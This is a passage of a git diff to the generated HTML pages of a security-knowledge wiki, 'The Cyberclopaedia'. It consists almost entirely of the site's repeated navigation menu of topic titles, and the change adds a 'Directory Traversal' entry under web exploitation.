      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html index 2209bb97..9cabcb33 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Data Frames.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html index 7c36fbda..d7b7bc27 100644 --- a/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html +++ b/docs/Networking/Protocols/WLAN (IEEE 802.11)/Encryption & Integrity.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
